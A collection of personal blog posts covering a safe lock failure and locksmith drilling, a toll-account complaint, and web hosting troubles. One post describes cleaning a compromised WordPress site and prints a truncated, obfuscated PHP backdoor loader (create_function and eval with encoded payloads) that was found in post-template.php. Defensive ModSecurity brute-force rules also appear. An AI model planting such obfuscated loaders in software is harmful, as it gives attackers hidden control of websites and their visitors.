Liberty Safes, A Review Like No Other…

So those that are friends with me on Facebook may be familiar with a recent predicament that had unbelievable timing, and not in the good way.  I have a series of lessons that many of you can learn from as well as a detailed experience of the warranty system behind Liberty Safes and S&G locks.

First let me detail what I had and what happened.  Here is my safe pre-issues.

Liberty Safe

That is a 50 CF Liberty Presidential safe.  It has an S&G Titan Direct Drive lock.  I could go into details now about the different security mechanisms but I will get to that a bit later.  The way the direct drive works is you punch in the code, a solenoid fires, at which point you can rotate the outer dial unlocking the bolt.

As my wife and I were packing up the house for the first weekend of the big move and she discovered a few items she needed to put in the safe.  She went out to the safe and then came and found me a couple of minutes later, “I think I forgot the combo she said.”  Interesting, I’ll go and try.  I walk out to the safe, punch in the code, no click, nothing, 5 seconds later it beeps as if it relocked.  Odd, try it again, same thing.  Try leaning on the door, doing everything in the list of stuff to do to get the safe open on their website.  No joy, further I know it’s the right code because I punch in a wrong one as a test, I get immediate feedback.

So, we are on a time-table and we figure we’ll call Liberty next week and schedule an appointment with a locksmith and drive back out for it.  Well folks, here’s a customer service fail and a lesson for you all if you ever find yourself needing to call Liberty.

First Lesson:

Don’t try to start a support chain by email.  I sent an email to their support contact and NEVER heard back. We turned around and called 24 hours later.

Second Lesson:

Have your safe’s serial number on hand.  It is on the packet of information that comes with the safe as well as is on the inside of the door.  Do NOT count on registering your safe to save you. I figured they could look my safe up as I had registered it, they could not.  Pissed barely begins to describe my attitude as I had to drive 5.5 hours back to the redoubt in the wheat field, hoping I could find the packet of safe info with the serial number on it.  Did I mention I was in the middle of moving and had packed up a decent chunk of my office?  Luckily I had not moved that box yet and was able to find it.  I called Liberty and everything quickly went along changing my attitude from pissed off to mildly annoyed.  It was Thursday and the locksmith will be out on Saturday.

Getting into the safe:

The lock smith arrives Saturday morning and takes one look at the safe and says, “Well shit!  That’s not the lock they told me was on there.”  We take the dial off and try a new one.  We bang on the door with a mallet trying to make sure nothing is stuck.  Alas, my thoughts were correct.  We get to drill my safe and they gave him the wrong lock type.

This has numerous impacts on things like drill points and design of operation.  He calls a buddy of his and gets the info he needs and we set to work. 20140412_120637

So behind this steel door are numerous traps and issues that can cause problems for people trying to break into a safe.  What kind of traps?  Ball bearings are the most notorious of the bunch.  What do they do to drill bits I hear you ask?  This:

20140412_125406

 

We chewed up 8 drill bits that Saturday and it took us 3 hours to get through into the lock case. Ah but we got into the lock case!  FYI, we did have to swap out for a corded hammer drill. Here’s a view of what those little bastards look like in the safe.

20140412_134221

Another drill bit that died trying to reach the lock case.

20140412_194831So we’re in, the safe should just open now right?  Well not so lucky.  You see, the numbers we had for the drill point were off by about an eighth of an inch.  We found the solenoid in the hole, but there was a vertical bar behind it too.  Here’s a picture of inside the lock, you’ll probably immediately figure out what we didn’t know.  A picture is worth a 1000 words.

20140418_101715

So looking at that image you have the solenoid, the grey box with Summit written on it, the actual moveable part, the wider shaft, and then the fixed shaft it moves on the thinnest piece.  The solenoid moves allowing the large metal bar to move up and down vertically.  That brass part turns causing the bar to raise up.  We drilled in about an eighth of an inch too far to the left.  We were smack on top of the fixed shaft but didn’t know it.  We then punched through to the back to see if the re-closer had possibly fired, it hadn’t.  In so doing we had severed the metal piece we needed to raise.

At this point we decided to call it and continue at it this week, mainly so he could find the diagram I have above and figure out exactly what was going on.  Yesterday morning he arrived about 9am.  We drilled a slightly larger diameter hole to the depth of the piece we needed to manipulate.  Grabbing metal that is flush with a hole is difficult.  We chew up 3 more bits in that process.  Then finally we start grabbing the metal but it still won’t pull up.  I had the idea to find the solenoid and push on it some more just incase it isn’t actually clear.  Bang!

20140418_115948It’s open, now what?

So now that the safe is open, we needed to remove the old lock, patch and harden the hole we made, install the new lock and then we’re done.  First we needed to remove the safe door backing.

20140418_121211

Next we see the inside.

20140418_121743I have some observations on the interior of the door along with disassembly which I will get to later.  But you can see the old lock in the middle. You can see the external re-closer to the left of the lock as well.  You will also note there is a diagonal bar running from just to the left of the lock down to the floor on the right side of the door.  First we needed to remove the old lock, easy enough, pull three screws and it’s off.

20140418_122839

You can see something covering the hole.  That’s because in this photo we’ve started to repair the safe.  We’ve packed the hole from the back side full of a steel based putty epoxy.  The from the front we add 2 more things with putty interspersed.

20140418_122945

That is a hardened steel ball bearing about the same diameter as the hole we had to drill.  That however wasn’t enough for my locksmith.  He added this little jewel.20140418_123104

That is going to seriously suck for whoever hits that will a drill.  It is a combination of carbide and steel and had to be tapped into place.  Basically your drill bit is going to have serious issues with that hole.

But Barron, the hole is still there right?  Yup and useless since I am switching lock types the position to drill out the new lock is different.  Basically someone is going to put all that effort in and be disappointed in the end.

So now we install the new lock, this time a mechanical dial, the why’s will be fully covered in the end.

20140418_125138 20140418_125309

We set the combination and he even left me the key so I can change it again later if I so choose.  It actually isn’t terribly difficult to do.  So what does the safe look like after all that?

20140418_135418

 

You can’t even see the drill point as it’s under the dial.  So now that we see what all I went through to get this detailed review, let’s go over all the things I’ve learned, my observations, what I learned from the locksmith, and any advice that I can give.

Lessons Learned:

As I mentioned at the beginning keep that damn serial number on hand.  Preferably store it in a digital form that can be accessed even in the middle of a move.  I still think Liberty should have been able to look up the info given my registration but don’t count on it.  Just store that serial number where you can find it.

Locks:

Next up, Digital Locks.  Avoid them like they will fail you because they will.  I got that digital lock after seeing better reviews than the earlier motorized version.  The locksmith informed me that the reason the previous version had so many issues is they used plastic for the gearing in side and it would strip.  They still haven’t altered that design.  The direct drive overcame this problem.

(Well damn, I forgot to take a picture of inside the original dial.)  If I had known the digital lock was made in China from the start I would have never done it. Figuring exactly what did happen would have happened further, here’s a picture inside my butchered lock for variety.

20140418_124420

See that orange cylinder in the corner.  Yeah that’s an electrolytic capacitor, my guess to keep the voltage up while the relay opens.  Problem is those types of capacitors aren’t known to last forever, far from it.  No thanks.  I figure that the design is made to die shortly after the warranty goes Tango Uniform.  I got luck and gone one that failed early.

Further they’re prone to other types of failures as well.

Warranties:

Here’s a dirty little secret that no one ever tells you.  That 5 year warranty on your lock is from the date of manufacture, not the date of sale.  Safe manufacturers do this because the lock manufacturers do it to them.  A lock failure ultimately means you’re safe is getting drilled, thus someone is going to have to foot the bill.  Liberty, like most other companies, and understandably, doesn’t want to be stuck with the bill for the failure of someone else’s product.

So again, go with the mechanical lock.  While they can fail, they are considerably more reliable, especially when properly maintained.

Lock Maintenance:

The safe companies recommend having your lock serviced once a year. My lock smith said truthfully for most people it’s about every 5 years.  It’s worth doing because there are a few parts that should be inspected just to ensure the discs don’t slip within the mechanical lock.

Safe Security:

It took us over 3 hours with the proper equipment to drill into the lock case, total it was about a days worth of work to get it open given we were off in our measurements.  That’s also given the detailed information of where to drill.  Overall I’d say this was one tough nut to crack and isn’t going to be done by your average burglar.

That said the locksmith did inform me that criminals are now using gas-powered and battery-powered cutoff wheels to cut off the sides or back of the safe since they are not as heavily hardened.  Jewelers safes pour concrete in and mixed with that concrete is re-bar, carbide chunks, aluminum and copper.

To give you a bit of background on my locksmith, he’s been doing this since he was in the Navy back in the 70′s.  He’s worked on government safes, locks, SCIFs, etc.  He knows his stuff and he pointed out that often good safes are destroyed by amateur locksmiths.

Remember, the goal of a safe is not to be impenetrable, but to buy time.  This safe bought a lot of time even against someone who knew what he was doing and had the details in advance.

What has me upset:

Well beyond the fact my lock failed, which frankly doesn’t have me happy, is what I discovered as we pulled it apart and chatting with the locksmith.

First up is this failure.

20140418_125420

Yes, that is a gap in the fire board.  Sure there is another 2 layers underneath but it doesn’t inspire confidence in those 3 layers.  A simple strip of the heat expanding tape would have worked well for that spot.

20140418_125309So if you look at the end of the screw driver you will see a small rod heading diagonally towards the ground I mentioned this earlier.  This is to prevent you from opening the bolts on your safe while the door is open.  However this design has some issues and can result in the safe refusing to lock.  If this happens to you, feel around the bottom edge of the door furthest from the hinges, there will be a rod, push it up and pull it down to try to reset it.  If that doesn’t work pull the cover off the door and look at the mechanism.

Further on the website they give the following fire rating with no caveats:

Liberty

However if you look at the inside of the door to the safe you see the following:

SafeRating

*BTU rating based on 25cf safe

So does that mean a larger safe should have its rating degraded due to its size?

Conclusions:

Liberty does stand behind their safes.  They took care of all the costs involved with this repair.  Annoyingly had this happened in July I would have been on the hook for a lock replacement and the costs of the locksmith.  From chatting with the locksmith, Liberty is a respected brand and my main issue here was that stupid lock, made by S&G.

Would I buy Liberty again? Not 100% sure on this because of those few quality issues I noticed and this was on a $5000 safe. I am going to be contacting Liberty specifically about the gap and see if they have any comments on the subject.  Not to mention the lack of detail about their fire ratings.  I will post an update if/and when they finally do get back to me.

Lastly, if you do have an issue, get a real locksmith.  Seriously, someone who is well skilled and trained.  Evidently many smiths won’t get versions of the locks to play with on their own to figure out how they work.  If you’re in the Palouse area, I highly recommend Mike at George’s Lock and Key Service.

 

Evidently the State Doesn’t Want My Money…

So let me lead off with the email I’m sending GoodToGo as I type this:

So some how I wasn’t notified as my account level got low. It’s now at -0.35 cents. I just went to go put money on it and am told “I can’t make a payment currently because the account is in negative balance.”

OK, I’ll try to call. I call and it wants some pin number that I don’t have and cannot find anywhere to set one on the website. I try to find a way to talk to a human and cannot find one.

So just to make sure I’m clear on this. I give an interest free loan to GoodToGo (WA DOT), am finally notified when I have a negative account balance because it’s run over, and when I try to go give another interest free loan I can’t? If it wasn’t for the fact this is “sanctioned by the state” I’d be calling the BBB to report a scam.

Why would I report a scam? Because at this point my assumption must be that the reason it is so difficult to pay a negative account balance is to accrue interest against the user, in which case why is my loan to the state an interest free one? And if not that to bill the user at a higher rate for using the toll bridge because my account is out-of-order. This also ignores the fact the first time I drove across the bridge I was billed through GoodToGo and sent a paper bill at a higher rate in the mail.

I have updated to a different card, although I would prefer not to have automatic payments configured on that card, but if this is going to be the way the state is going to behave I do not have much of a choice.

I had been making a habit of making one time payments when notified and this time I couldn’t.

As an additional note I will be forwarding this to my state representatives asking how this type of user interface and treatment of Washington State citizens is acceptable. Especially for those of us who purely use this in transportation to or from work. I will also be posting a copy of my experience and this letter, along with how the situation is handled on my blog.

Thank you and sincerely,
Barron Barnett

So for those not familiar with the GoodToGo system, you maintain a balance for toll roads around Western  Washington.  When you take one it subtracts from that balance.  When the balance gets low it can automatically get more from a credit card or deduct from a bank account.

The initial credit card I was using has been disabled, not because of lack of payment or anything, it just has and I’m too lazy to go call the bank to fix it.  I’m going debt free so why bother worrying about it, it forces me to not use it.

So I take to paying off my debit card when I get a low balance notice.  I get no low balance notice until I get a call and email about it this morning.  I go look at my account, -$0.35.  Well I need to fix that, I go into payments and see:

Outstanding Balance
Account balance is negative, payment not allowed. Please contact the Customer Service Center.

I then hop on the phone and start getting drug through automated menus.  Finally get to one that sounds reasonable, it asks me for my account number. I enter it.  Then it asks for a 4 digit pin.  A what?  I never configured a 4 digit pin, not that I remember anyway, and I cannot find anywhere in the online forms to find or configure a 4 digit pin.

So lets recap.  I’ve been giving interest free loans to the State of Washington so that I can drive over public roads at a non-inflated price.  I guess you could say that’s the interest, but then some pay more interest in others do they not because that becomes dependent on how long it takes for them to dwindle their account balance, but I digress.

Evidently my account ran negative and I just discovered this.  I attempt to use the manual payment system and am told to contact the Customer Service Center.  I do exactly that, and am greeted with an automated system asking for information that I do not know and cannot find a method to find out or set.

Ultimately leaving me in the following state, an outstanding balance I’m now aware of and unable to pay because their system is so screwy I could swear it was built by the same idiots that made the Obama-care website, and some would wonder why I don’t want my financial information stored within it.

And people wonder why I view the state as worthless and unable to pour piss out of a boot reading the directions off the heel.  If I can’t pay them when I owe them money, what the hell do they need the money for in the first place?

Quote of the Day – Ry Jones (2/24/2014)

In WireShark I trust.

Ry JonesThere is no evidence to support that claim.
February 24th, 2014


[Yup.  As a geek this kicked over my giggle box.  Doubly so since I've been in that same position.

Well I don't care what you say, WireShark shows no traffic related to X when you're process is running.  So you're craps broken, deal with it!

I've noticed it is a unique individual who will just willingly admit, "Yup I screwed up, give me a couple minutes so I can fix that." Most of the time people are more interested in saving face and making themselves not look bad.

I find it better to look good by admitting my mistake and fixing the problem, but that's just me.  -B]

Today’s hour long educational presentation…

Even if you don’t really speak tech, watch it.  He doesn’t really go into deep details, though it does require some understanding of how networking works.

If you still don’t want to take the hour let me synopsize it into one single sentence:

Nothing is safe.

And there isn’t much of a hope for immediate improvement either because the NSA is leaning on organizations to leave a lot of this crap in place.  Not to mention they do not report security threats instead they want them left open for exploitation.

There are couple things that desperately need to change, one of the biggest is security needs to stop being an afterthought in software and systems development.  I’ve said it before folks, we’re in a cold war and one side just doesn’t want to admit the truth of the matter yet.

Zombies are Real and Infectious…

hacker-free-hack-the-planet-112296

That is of course unless you supply a couple well placed rounds to the upper cranial cavity once you discover their plight.

Let me start off at the beginning.  Over the past month I’ve been busy working on polishing the finishing edges of my new VPS.  I’ve spent a lot of time securing it and going through everything I can to provide me the best probabilities for survival when the inevitable finally happens.

Last weekend I migrated Linoge and Weer’d over to the new server as well since I had finished hammering out the last of the kinks with the help of the LiquidWeb support team.

I moved Linoge over and had a few minor oddities which I quickly fixed and got taken care of.  From there I set my sights on moving Weer’d

I logged in, dumped the database, tar’d up the site.  The tar fails, odd, what do you mean you couldn’t read that file?  Didn’t think much of it, found the file, odd the permissions are 000.  This isn’t my site though and I’m not sure if there was something special done so I fix it.  Total I fix 8 files like this.  I move the site over, and get him set up on the new server.  It actually went even smoother than Linoge and didn’t require a weird step.

Fast forward 24 hours to when I begin my evening log check.  I run tail /var/log/messages.  What I see does not provide me comfort.

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker ’66.249.76.207′, file ‘/home/weerd/public_html/wp-includes/post-template.php’, line 694)

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker ’66.249.76.207′, file ‘/home/weerd/public_html/wp-includes/post-template.php’, line 694)

What!?  I promptly dump open that file and am greeted by the following:

/**

* Applies custom filter.

*ap

* @since 0.71

*

* $text string to apply the filter

* @return string

*/

function applyfilter($text=null) {

  @ini_set(‘memory_limit’,’256M’);

  if($text) @ob_start();

  if(1){global $O10O1OO1O;$O10O1OO1O=create_function(‘$s,$k’,"\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\……………\164\56\75\44\143\150\141\162\73\40\175\40\162\145\164\165\162\156\40\44\164\141\162\147\145\164\73"); if(!function_exists("O01100llO")){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,‘od%2bY8%23%24%3fMA%2aM%5dnjjMjBBPP%3eF%27VzBPp%5ez1h%27%27hIm%2bKKbC0XJ%5e%3b%60%40Bd44d%22%2eULLtT1MMZf%3eZSRt%22%2a%2a0y%5cjj%291%………………….%3eBhG%27%7dl’,6274);}call_user_func(create_function(,"\x65\x76\x61l(\x4F01100llO());"));}}

  if($text) {$out=@ob_get_contents(); @ob_end_clean(); return $text.$out;}

}

Now, for those who may not realize it, that odd text in there I immediately recognized as obfuscated code… that was in the middle of a standard WordPress installation.  Das Not Good.  Promptly I shifted into Defcon 2, the good news was the IP in the log was Google crawling the site.  I promptly bump an email to Weer’d along with everyone else about this new Charlie Foxtrot.

I have no idea how severe this incident is at this point I trust absolutely no one.  My first order of business is to close the problem that I now see.  I manually reinstall WordPress overwriting ALL the existing files on the server.  This promptly stops those trailing messages in my log.  Something new happens though.

Weer’d has WordFence security, fantastic plugin and I highly suggest it, and I run a scan, it say’s nothing is wrong.  I call BS.  There is no way that’s it.  I do a diff with another site that is known good and discover a pile of files.

image

There’s the list in a little more file friendly form.  I promptly removed and reinstalled the WordFence plugin.  This is where things get interesting.  I see this in the scan output

Mon, 06 May 13 02:45:03 +0000::1367822703.7602:2:info::Adding issue: This file appears to be an attack shell

Mon, 06 May 13 02:45:03 +0000::1367822703.7594:2:info::Adding issue: This file appears to be an attack shell

And I had to keep running the scan over and over.  I finally just resort to nuking everything, double checking from a shell and then reinstalling what I do actually want to keep.  Overall this is very little.  Every time I run a scan after fixing something I find something new.  Eventually I discover that the theme has been compromised.  Dump the theme and replace it.  Overall there were both stock WordPress files that were compromised along with additional files that were added but made to look legitimate.

After a short while I had the site cleaned up.  I will do a more through cleaning but that was the immediate action remedy for BF 30 in the am Sunday night.

I do however want to investigate the details of this.  I login to the old server and start looking around.  All the exploits are still present, so that means it was prior to the move and then I look at the root directory:

clip_image002

Do you see it?  Here’s the dump of what’s inside:

clip_image002[4]

Now if you closely pay attention you can gleam a few important facts from the above.  First, they had multiple exploits to get back in.  Second, they obtained root access on the box.  In hindsight I noticed a few things (other than the interesting file name that should have been a giant fucking red flag) such as .bash_history not working correctly.  Lastly though we can note the date for the last edit October 5th, 2012.

There’s a reason that rung a bell with me.  From an article dated Oct 3, 2012

The distributed denial-of-service (DDoS) attacks—which over the past two weeks also caused disruptions at JP Morgan Chase, Wells Fargo, US Bancorp, Citigroup, and PNC Bank—were waged by hundreds of compromised servers. Some were hijacked to run a relatively new attack tool known as "itsoknoproblembro." When combined, the above-average bandwidth possessed by each server created peak floods exceeding 60 gigabits per second.

More unusually, the attacks also employed a rapidly changing array of methods to maximize the effects of this torrent of data. The uncommon ability of the attackers to simultaneously saturate routers, bank servers, and the applications they run—and to then recalibrate their attack traffic depending on the results achieved—had the effect of temporarily overwhelming the targets.

It appears I found a zombie that was sleeping in my friends place and inadvertently moved him.  That’s OK though, upon finding him I filled him full of 00 Buck Shot and did a mag dump from the AR for good measure.  I will also be killing the entire area with fire here when I get a bit more free time.

My actions though are leaps and bounds beyond what Dreamhost is doing and remember they’re the one’s who actually suffered a data breach and have a sever where root was compromised.

Thank you for writing.  Let us assure you that you’re not on your own!  We’re here to guide you through this process as much as we possibly can.  By the time you’re reading this email we have attempted to clean some basic rudimentary hacks out of your account and fix any open permissions; any actions taken will be noted below.
Going forward, we need you to take care of some basic site maintenance steps to ensure that your account has been secured.  To get started, please read and act on all of the information in the email below.  Since it involves editing and potentially deleting data under your users we are not able to complete all tasks for you.  If you have questions about the noted items please provide as much information and detail as possible about where you are getting stuck and we will do our best to assist you.
Here’s another area where we’re able to help — if you would like us to scan your account again for vulnerabilities after you have completed some or all of the steps below, please reply to this email and request a rescan and we can then verify your progress or if there are any lingering issues.
Most commonly hacking exploits occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains.  To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor.  The following site can help you determine if you’re running a vulnerable version:
– Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory.
2) Remove ALL third-party plugins/themes/templates/components after upgrading your software installations, and from those that are already upgraded under an infected user.  After everything is removed, reinstall only the ones you need from fresh/clean downloads via a trusted source.  These files typically persist through a version upgrade and can carry hacked code with them.  Also, many software packages come with loads of extra content you don’t actually use and make searching for malicious content even harder.
3) Review other suspicious files under affected users/domains for potential malicious injections or hacker shells.  Eyeballing your directories for strangely named files, and reviewing recently-modified files can help.  The following shell command will search for files modified within the last 3 days, except for files within your Maildir and logs directories.  You can change the number to change the number of days, and add additional grep exception pipes as well to fine-tune your search (for example if you’re getting a lot of CMS cache results that are cluttering the output).
find . -type f -mtime -3 | grep -v "/Maildir/" | grep -v "/logs/"
In scanning your weerd user we found 3 hacked files that we were able to try and clean.  Backups of the original hacked files can be found at /home/weerd/INFECTED_BACKUP_1367876582 under your user, with a full list of the original files at /home/weerd/INFECTED_BACKUP_1367876582/cleaned_file_list.txt.  You should verify that your site is working fully after being cleaned and then delete the INFECTED_BACKUP directory fully.
Likely hacked code / hacker shells that we could not automatically clean were found under weerd here:
Likely hacked code / hacker shells that we could not automatically clean were found under jp556 here:
For information specific to WordPress hacks please see:
http://wiki.dreamhost.com/My_Wordpress_site_was_hacked
More information on this topic is available at the following URL under the "CGI Hack" and "Cleaning Up" sections:
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites

Seriously… A shared hosting server, not a VPS mind you, where there is evidence of a shell compromise that resulted in Root access and your response is, “Here we’ll help you remove the malicious code from your site.”  Uh, already done that sparky but the bad news is that’s like closing the barn door after the cow has gotten out.  Or more specifically closing the front door and locking it after the serial killer has gotten into your house.  You really think those guys didn’t create backdoors in other sites? 

The real reason we were informing you is because you have a breach which placed everyone who has data on that server in danger.  I’m root, I can just go and place whatever exploit I want in whoever’s code I want.  I don’t think you understand why I had Linoge contact you boy genius.

Yes I understand you want to look good and not like a complete idiot in front of your customers.  Know what though “Pride goes before destruction, a haughty spirit before a fall.”  I was informing you because this is serious and at least an acknowledgement of, “thank you, we will get right on that” would be smart.  Try having to deal with constant outages and not being sure exactly why it’s happening.  It sucks, every time something goes wrong I think my forehead gets flatter from my desk.  Luckily at this point I think it’s solved and todays was a bit of an odd duck that only affected one site but I digress.

Linoge informed me his server issues started late last September/early October and have continued right up to today.  Well I’m sorry but we have heavy signs of enemy action and that is no coincidence.  That server is most likely still compromised at the root level and it appears Dreamhost has no interest in fixing it.  With a shared host your attack surface area is much larger and your odds of compromise increase.  So does the damage from a root compromise.

So remember folks, digital zombies exist, they are contagious if you’re not careful, and are best dealt with a serious dose of heavy metal positing followed by a tactical nuke to the general vicinity.  Be very careful too, sites you may think are safe may have actually been compromised.  Now hopefully I can get all the other stuff I’m trying to get done and finally get some sleep.  Constant 0200 bedtimes with 0630 rise times are eating me whole.

How I know I moved to the right host

There have been teething issues over the past week.  I’m still working out a lot of the kinks, but there was a relatively big incident last Friday.  Let me just let my hosting provider give the overview of what happened, the analysis, and their corrective actions.

Dear Customer,

Earlier today, we had to perform emergency maintenance on a critical piece of power infrastructure. Our customers’ uptime is of critical importance to us and communication during these events is paramount.  At this time, power has been restored and servers are back online. Listed below is a timeline of events, record of ongoing communications, SLA compensation information and a detailed outline of the steps we’re taking to prevent against these issues in the future. If at anytime you have any questions please do not hesitate to call, email or chat.

Timeline of Events:

  • 11:00 – During a routine check of the data center by our Maintenance staff, the slight odor of smoke was detected. We immediately began a complete investigation and located the source of the smell; a power distribution unit in Liquid Web DC3, Zone B, Section 8 covering rows 10 & 11.
  • 11:05 – We discovered a manufacturer defect in the Power Distribution Unit (PDU).  This defect resulted in a high resistance connection which heated up to critical levels, and threatened to seriously damage itself and surrounding equipment.  This bad connection fed an electrical distribution panel which powers one row (Lansing Region, Zone B, Section 8, Row 11)  of servers which is part of our Storm platform.  We immediately tried to resolve the issue by tightening the connection while the equipment was still on, but it wasn’t possible. To properly resolve the situation and repair the equipment, we needed to de-energize the PDU to replace an electrical circuit breaker.
  • 11:15 – To avert any additional damage, we were forced to turn off the breaker which powered servers in Lansing Region, Zone B, Section 8, Row 11. All servers were shut down at this time.
  • 11:48 – Servers in Lansing Region, Zone B, Section 8, Row 10 began to be shut down.
  • 11:49 – Once it was safe to begin the work, we immediately removed the failed components and replaced them with spares.  We discovered that the failed connection was due to a cross threaded screw installed at the time of manufacture.  This cross threaded screw meant the connection wasn’t tightened fully, and resulted in a loose, high resistance connection which heated far beyond normal levels. Upon replacing the breaker, we re-energized the PDU and customer servers.  Our networking and system restore teams have been working to ensure every customer comes back online as soon as possible.
  • 12:52 – Power was restored and servers began to be powered back on.

Communication During Event

We know that in the event of an outage, communication is of critical importance.  As soon as the issues were identified we provided the following updates on the Support Page and an “Event” which emails the customer as well as provides an alert within the manage.liquidweb.com interface.

Event Notice on Support Page:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting a small number of Storm servers in Zone B. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion. “

Event Notice Emailed to Customers:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting 1 or more of your Storm instances. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion.”


SLA Compensation

Liquid Web’s Service Level Agreement (SLA) provides customers the guarantee that in the event of an outage the customer will receive a credit for 10 times (1,000%) the actual amount of downtime. From our initial research into this event it appears as though most customers experienced between 1 hour and 2 hours of downtime.  However, due to the disruptive nature of this event we are providing a minimum of 1 full day of SLA coverage for any servers that were affected by this event.  Please contact support if you have any additional information regarding this event of if you would like to check on the status of your SLA request.

Liquid Web TOS Network SLA
http://www.liquidweb.com/about/dedicatedsla.html

Network SLA Remedy
In the event that Liquid Web does not meet this SLA, Dedicated Hosting clients will become eligible to request compensation for downtime reported by service monitoring logs. If Liquid Web is or is not directly responsible for causing the downtime, the customer will receive a credit for 10 times ( 1,000% ) the actual amount of downtime. This means that if your server is unreachable for 1 hour (beyond the 0.0% allowed), you will receive 10 hours of credit.

All requests for compensation must be received within 5 business days of the incident in question. The amount of compensation may not exceed the customer’s monthly recurring charge. This SLA does not apply for any month that the customer has been in breach of Liquid Web Terms of Service or if the account is in default of payment.


Moving forward

All PDU’s will be inspected for the same issue for all panels and all main breakers.

In this case, this PDU was just recently put into service.  When we purchase critical power equipment, the manufacturer performs an onsite startup procedure. This equipment check includes a physical inspection, phase rotation, voltage checks, alarm checks and many more.  This particular manufacturer defect didn’t avail itself until the PDU was under a significant amount of load.  Once the manufacturer defect began, the screw at the bus finger began to overheat. Once this overheating began, the resistance increased causing a serious risk of catastrophic failure.

Going forward, Liquid Web will perform additional tests, above and beyond our manufacturer startup procedures, on new equipment to look for manufacturer related defects and issues. We will now perform testing at full load by utilizing a Power Load Banking System.  This testing procedure was already in place for the vast majority of our power equipment but now will also include PDU specific testing.

Liquid Web performs preventative maintenance (PM) on all PDU’s.  This PM is an inspection that consists of current draw recording on all branch circuit breakers, infrared imaging of main connection points and on the transformers and a general inspection.  This is typically a quarterly inspection.

Yeah, I can’t argue with a company that honest.  Plus they go out of their way to help solve problems which technically may not even be their problem or responsibility. 

Oh, and I2R losses as always, are a pain in the ass.

0 to Attacked in No Time Flat

So as I’ve mentioned previously I’ve moved to the world of a VPS which for all intents in purposes is much like being self-hosted.  I used to do this stuff a long time ago, I still do it but not nearly as intensively and for the most part my shell-fu has gotten rusty.

I spent the first part of Saturday getting the server setup and figuring out WHM and cPanel, both unbelievably easy.  The biggest issue was making sure I had things locked down.  I just set up this server though, who could possibly be attacking it?

A6WLUZ bandwidth (full)

Bandwidth usage since I turned on the server.

You can see where I turned the server on on the 13th.  Notice that big spike shortly there after, yeah that was a huge influx of traffic.  It caused the server to grind to a halt.  At the time I thought it was related to me bringing up my site since it locked up within minutes and I had tweaked some server settings an thought that caused the instability.

Come Monday morning I have an email from A Girl that she cannot get in and 2 from the data-center that they rebooted the server after it ran out of memory and locked up.

A6WLUZ_load_full

System loading and availability since being turned on.

You cant see it as well except for the latest incident in those images but there is a serious proc-load spike when those bandwidth spikes occur.  I promptly switched from APF to CSF for my firewall so I could gain use of the LFD.  I spent my time installing and configuring it last night.

A6WLUZ Detail

The Proc Spike I had overnight.

 

A6WLUZ

A more detailed image of the bandwidth spikes.

There you can see the proc spike from an an incident last night.  I did a few more tweaks to the CSF and you can see things were better when they tried again about an hour later.  In the middle of all of this I also discover that there is a way to have Apache watch all the wp-login pages for failed logins.  When they happen, block and ban the IP after numerous failed attempts.  This is why I called myHosting lazy and was so pissed about their approach in handling the problem.

If you are a server administrator and want to protect against the WordPress brute force attack it is quite simple, doubly so if you have WHM.

Login to WHM, goto Software-EasyApache.  Follow the onscreen instructions and rebuild Apache but make sure the modsec2 module is selected.  Build Apache.

Once built, log in to your shell and edit /usr/local/apache/conf/modsec2.user.conf and add the following.

#Block WP logins with no referring URL
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000210
<Locationmatch “/wp-login.php”>
SecRule REQUEST_METHOD “POST” “deny,status:401,id:5000211,chain,msg:’wp-login request blocked, no referer’”
SecRule &HTTP_REFERER “@eq 0″

#Wordpress Brute Force detection
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000212
<Locationmatch “/wp-login.php”>
# Setup brute force detection.
# React if block flag has been set.
SecRule ip:bf_block “@gt 0″ “deny,status:401,log,id:5000213,msg:’ip address blocked for 5 minutes, more than 10 login attempts in 3 minutes.’”
# Setup Tracking. On a successful login, a 302 redirect is performed, a 200 indicates login failed.
SecRule RESPONSE_STATUS “^302″ “phase:5,t:none,nolog,pass,setvar:ip.bf_counter=0,id:5000214″
SecRule RESPONSE_STATUS “^200″ “phase:5,chain,t:none,nolog,pass,setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180,id:5000215″
SecRule ip:bf_counter “@gt 10″ “t:none,setvar:ip.bf_block=1,expirevar:ip.bf_block=300,setvar:ip.bf_counter=0″

Save the file and restart Apache.  This will help stop the brute force attacks.  If it wasn’t for the off chance of false positives, I’d be good with a perma-ban and dropping that axe like a rock….

Funny story, I dropped that !@#$ing ax on myself tonight.  Most of the other services are watched by LFD and when you get multiple login failures, it drops the ax and hard.  I screwed up logging in and paid the price.  I was just going along minding my own business and tried to login a couple times with the wrong password and bam there I am behind a curtain with some asshole molesting my balls.  Man, when I describe it like that it sounds like my intrusion detection system works for the TSA.

In the mean time the folks I got the VPS from (they’ve been fantastic support wise, unlike that previous host) are looking into trying to figure out what’s causing the load spikes.  The bummer is it randomly happens so it’s a paint to catch in the act. The good news is the past couple slams the server has actually survived so it’s almost there.  Security wise it isn’t a concern, it’s just and issue with service.

Too Little Too Late…

So I got the following email at 1630 tonight.  I know the ball started at 0800 this morning thanks to twitter.  They may have had that many complaints to work through but here is the email I got.

Dear Barron,

My name is CS Rep and I am writing you from Customer Relation Department. Your case was brought to my attention because you gave us a bad review on Twitter. We are very serious about providing you with an exceptional hosting and customer service experience, we would like to confirm that everything is running as you would like. What would it take for us to became the best hosting provider for you?
